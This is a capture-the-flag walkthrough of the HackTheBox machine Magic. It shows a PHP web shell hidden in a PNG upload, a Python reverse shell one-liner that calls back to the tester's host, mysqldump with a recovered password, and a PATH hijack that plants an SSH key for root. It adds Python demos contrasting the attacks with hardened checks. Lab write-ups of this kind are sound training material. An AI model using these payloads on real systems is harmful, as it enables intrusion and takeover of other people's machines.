The HackTheBox platform is a good place to develop cybersecurity skills. One popular machine is Magic, which lets pentesters practice investigating web application vulnerabilities, recovering credentials, exploiting services, and escalating privileges to root. In this article we cover all the steps of working through Magic, from gathering information and scanning ports with masscan and nmap, to building the exploit and escalating privileges.
The article covers a web shell embedded in an image file, retrieving credentials with mysqldump, and escalating privileges through a PATH hijack in the sysinfo program.
The lab is reached over VPN. For safety, do not use a work computer or a device that stores sensitive data: the work involves connecting to a private network shared with other users, some of them highly skilled, and your own machine is reachable from it.
This machine has an IP address of 10.10.10.185, which we add to /etc/hosts.
10.10.10.185 magic.htb
First, a scan of open ports is performed. To speed up the process, masscan is used first instead of nmap. This tool scans all TCP and UDP ports through the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.185 --rate=500
Now, to get more detailed information about the services behind the open ports, we run nmap with the -A option (OS and version detection, default scripts and traceroute) against just those ports.
nmap -A magic.htb -p22,80
There are two open ports on the host: 22 (SSH) and 80 (a web server). As usual, we start by opening the site in a browser.
We notice a link to the login page. We try the usual login-bypass tricks against the form and find one that works.
Behind the login there is an image upload form. To exploit it, PHP code is placed in a file that still looks like an image: the file begins with the four PNG signature bytes and the web shell is appended directly after them. The file is given a double extension, because the upload handler checks only the last extension, while the web server decides whether to execute the file based on the earlier .php extension.
python3 -c 'import sys; sys.stdout.buffer.write(b"\x89PNG" + b"<?php echo system($_GET[\"cmd\"]); ?>")' > 1.php.png
(The Python program is wrapped in single quotes so the shell does not expand $_GET, and the bytes are written through sys.stdout.buffer so that print does not re-encode \x89 as two UTF-8 bytes and break the signature.)
However, the server detects the attempt and rejects the upload.
Let's be a little more cunning and hide the code in the image's comment (metadata) field instead of appending it to the file body.
This time the server reports that the upload completed successfully.
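As an added example (not code from the original article), the following Python script builds a small but fully valid PNG whose tEXt chunk, the PNG equivalent of an image comment, carries the web shell; checks it the way a naive upload handler would (magic bytes plus the last extension); and shows a stricter filename policy that would have blocked the double extension. The payload, the PNG builder and both check functions are constructed here for illustration: the article does not show the exact tool or field the author used for the comment, nor the server-side checks, so the naive check is an assumption about their shape and the hardened one is a suggestion.

```python
import hashlib
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Constructed payload for the demo: the same kind of one-line web shell the walkthrough uses.
PAYLOAD = b'<?php echo system($_GET["cmd"]); ?>'


def png_chunk(ctype, data):
    """Encode one PNG chunk: 4-byte length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_with_comment(comment, width=1, height=1):
    """Build a minimal but fully valid 8-bit RGB PNG whose tEXt chunk (keyword
    'Comment') carries `comment`. Unlike bytes blindly appended after the signature,
    the result opens in any viewer and passes magic-byte checks such as PHP's
    exif_imagetype()."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # One scanline per row: filter byte 0 followed by black RGB pixels.
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    text = b"Comment\x00" + comment
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b""))


def png_chunks(data):
    """Parse the chunk list back, verifying every CRC; returns [(type, body), ...]."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, out = len(PNG_SIG), []
    while pos < len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError("bad CRC in chunk %r" % ctype)
        out.append((ctype, body))
        pos += 12 + length
    return out


def naive_upload_ok(filename, data):
    """Assumed shape of the weak server-side check: image magic bytes plus the text
    after the LAST dot. 'shell.php.png' sails through."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return data.startswith(PNG_SIG) and ext in {"png", "jpg", "jpeg"}


def hardened_store_name(filename, data):
    """Stricter policy: reject any dotted component that is a script extension, require
    the extension to match the content, and store under a server-chosen name.
    Returns the name to store under, or None to reject the upload."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or any(re.fullmatch(r"ph(p\d?|ar|tml|ps)", p) for p in parts[1:]):
        return None
    if parts[-1] != "png" or not data.startswith(PNG_SIG):
        return None
    return hashlib.sha256(data).hexdigest()[:16] + ".png"


if __name__ == "__main__":
    img = build_png_with_comment(PAYLOAD)
    with open("me.php.png", "wb") as fh:
        fh.write(img)
    print([t for t, _ in png_chunks(img)])         # [b'IHDR', b'tEXt', b'IDAT', b'IEND']
    print(naive_upload_ok("me.php.png", img))      # True: the weak check accepts it
    print(hardened_store_name("me.php.png", img))  # None: the stricter check rejects it
```

Checking the first few bytes only proves that the file starts like an image, not that it is harmless; the durable fix is to store uploads under a server-generated name with a fixed extension, in a directory the web server will never execute scripts from.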
The file is uploaded, but where exactly? A directory scan is run to find its location. Since the site has a simple structure and there was enough time, gobuster with large wordlists was not necessary; dirb is launched instead to enumerate the available directories.
We have probably found the directory where uploads are stored. Now we request our file and pass ls in the cmd parameter.
It works: the directory listing appears in the response.
We pass a Python reverse shell as the parameter (the browser percent-encodes the spaces and quotes when the URL is submitted):
http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.60",4321));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And our listener on port 4321 receives the connection.
In the web application's directory we find the file used to connect to the database.
It contains a database user name and password.
A system account with the same user name exists, but switching to it with su using this password fails.
mysqldump, however, can be used with those credentials. Dumping the database reveals another password. Note that the password must be attached directly to -p with no space; otherwise mysqldump treats the next word as the database name and prompts for a password.
mysqldump -u theseus -piamkingtheseus Magic
With that password su succeeds, and we read the user flag.
The sysinfo program is discovered on the host. Searching online turns up nothing about it being able to execute commands. The next idea is to check whether sysinfo itself calls other programs that could be replaced. To see this, the program is run under ltrace, which shows its library calls and, through them, the external commands it runs.
It turns out that sysinfo launches lshw, fdisk and cat by name rather than by absolute path, and since it runs with root privileges, this is the local privilege escalation vector. A bit more on how it works: the PATH environment variable holds a list of directories.
When a command is invoked by name, for example ls or cat, the system searches those directories in order and runs the first matching executable it finds. If you put your own directory at the front of PATH and place a program with the same name there (a fake ls or cat, say), that program is the one that runs.
We test this principle with the fdisk command. Instead of running a reverse shell, we write a script that appends our SSH public key to root's authorized_keys file. That way we can log in as root over SSH just as we did for the regular user.
First we call fdisk as-is: as expected, the legitimate fdisk is resolved.
We put our script, named fdisk, in /tmp/123 and prepend that directory to the PATH environment variable.
Now the system will look for fdisk in /tmp/123 first.
Let's run sysinfo.
It fails with an error because root has no .ssh directory yet. The script is modified to create the directory first and then append the key. After running sysinfo again, fdisk produces no errors.
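As an added example (not the author's script, which the article does not show), the following Python program reproduces the whole PATH-hijack procedure above in temporary directories: it plants a fake fdisk that installs a public key, shows that a PATH lookup now resolves to the planted copy, runs it the way a helper like sysinfo would (by bare name, trusting the inherited PATH), and contrasts that with a hardened caller that uses a fixed search path. The public key, the planted script, the directory names and the helper functions are all constructed for the demo; the fake script uses mkdir -p so the missing .ssh directory the walkthrough ran into is handled on the first run. Nothing here touches /root or your own ~/.ssh.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed stand-ins for this demo: the attacker's public key and the script planted
# under the name "fdisk" (an assumption about the shape of the author's script, built from
# the steps the walkthrough describes).
ATTACKER_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDEMOKEYNOTREALXXXXXXXXXXXXXXXXXXXXXX attacker@demo\n"
FAKE_FDISK = """#!/bin/sh
# Planted 'fdisk': runs with the privileges of whatever invoked it through PATH.
# mkdir -p covers the failure the walkthrough hit when ~/.ssh did not exist yet.
mkdir -p "$HOME/.ssh" && chmod 700 "$HOME/.ssh"
cat "$(dirname "$0")/attacker.pub" >> "$HOME/.ssh/authorized_keys"
chmod 600 "$HOME/.ssh/authorized_keys"
echo HIJACKED
"""
# A fixed search path a privileged helper should use instead of the caller's PATH.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def scratch_dir():
    """A fresh temporary directory (stands in for /tmp/123 or /root in the demo)."""
    return tempfile.mkdtemp()


def plant(directory, name="fdisk"):
    """Write the fake tool and the key it installs into a directory we control."""
    with open(os.path.join(directory, "attacker.pub"), "w") as fh:
        fh.write(ATTACKER_PUBKEY)
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(FAKE_FDISK)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def hijack_path(work):
    """PATH with our directory in front, as prepending /tmp/123 to PATH does."""
    return work + os.pathsep + SAFE_PATH


def resolve(cmd, path_env):
    """The shell's lookup rule: the first executable match walking PATH left to right."""
    return shutil.which(cmd, path=path_env)


def run_by_name(cmd, path_env, home):
    """What a helper like sysinfo does: invoke a tool by bare name and trust the inherited
    PATH. Returns the command's stdout, or None when nothing on the path matched."""
    exe = resolve(cmd, path_env)
    if exe is None:
        return None
    proc = subprocess.run([exe], capture_output=True, text=True,
                          env={"PATH": path_env, "HOME": home})
    return proc.stdout.strip()


def run_hardened(cmd, home):
    """The fix: a privileged helper ignores the caller's PATH (fixed search path, or
    absolute paths such as /sbin/fdisk), so a planted copy is never considered."""
    return run_by_name(cmd, SAFE_PATH, home)


def authorized_keys(home):
    """Read back whatever the planted script managed to write for this home directory."""
    try:
        with open(os.path.join(home, ".ssh", "authorized_keys")) as fh:
            return fh.read()
    except FileNotFoundError:
        return ""


if __name__ == "__main__":
    work = scratch_dir()         # plays the role of /tmp/123
    victim_home = scratch_dir()  # plays the role of /root, with no .ssh directory yet
    plant(work)
    print(resolve("fdisk", hijack_path(work)))                   # the planted script wins
    print(run_by_name("fdisk", hijack_path(work), victim_home))  # HIJACKED
    print(ATTACKER_PUBKEY.strip() in authorized_keys(victim_home))  # True
```

The same lookup rule is why the real fix belongs in the privileged program, not in the user's environment: a setuid helper that spawns lshw, fdisk or cat must either call them by absolute path or reset PATH to a fixed value before doing so.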
Finally, we connect over SSH as root and read the last flag.